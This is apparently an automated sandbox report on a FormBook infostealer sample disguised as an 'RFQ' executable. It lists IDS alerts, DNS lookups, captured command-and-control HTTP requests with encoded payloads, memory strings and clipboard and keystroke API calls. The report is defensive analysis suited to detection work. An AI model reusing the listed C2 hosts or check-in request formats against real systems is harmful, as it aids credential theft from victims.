Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49826 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49833 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49865 -> 156.251.17.224:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49852 -> 156.251.17.224:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.duwixushx.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 54.244.188.177 54.244.188.177

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49707
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49706
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49706
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49709
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49709
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49707
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49837
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49844
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49837
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49844

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	HTTP traffic detected: GET /px6j/?9dfhu=10RxttPPB0&6Pvh8TXP=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1Host: www.sunnyz.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9ffw/?6Pvh8TXP=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&9dfhu=10RxttPPB0 HTTP/1.1Host: www.d48dk.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /d3gs/?6Pvh8TXP=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&9dfhu=10RxttPPB0 HTTP/1.1Host: www.8312zcksnu.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4nyz/?6Pvh8TXP=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&9dfhu=10RxttPPB0 HTTP/1.1Host: www.snyp.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: www.sunnyz.store
Source: global traffic	DNS traffic detected: DNS query: www.d48dk.top
Source: global traffic	DNS traffic detected: DNS query: www.8312zcksnu.bond
Source: global traffic	DNS traffic detected: DNS query: www.snyp.shop
Source: global traffic	DNS traffic detected: DNS query: www.duwixushx.xyz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz

Source: unknown

HTTP traffic detected: POST /yjbljodlunyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 838

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:32:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:32:59 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:04 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/=
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/punqdgkybi
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/punqdgkybi-8
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/punqdgkybiS
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/punqdgkybis
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/h
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/yjbljodlunyh
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/yjbljodlunyhsT
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: iavbXasnTxCeiF.exe, 00000011.00000002.2753929696.000000000520D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.duwixushx.xyz
Source: iavbXasnTxCeiF.exe, 00000011.00000002.2753929696.000000000520D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.duwixushx.xyz/u11p/
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: elevation_service.exe.0.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: elevation_service.exe.0.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: choice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d
Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10338gd
Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: choice.exe, 00000010.00000003.2166044725.000000000743E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: choice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shksj.sdnasj.nduau.cn/123.html
Source: choice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: choice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00473F66

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0046001C

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
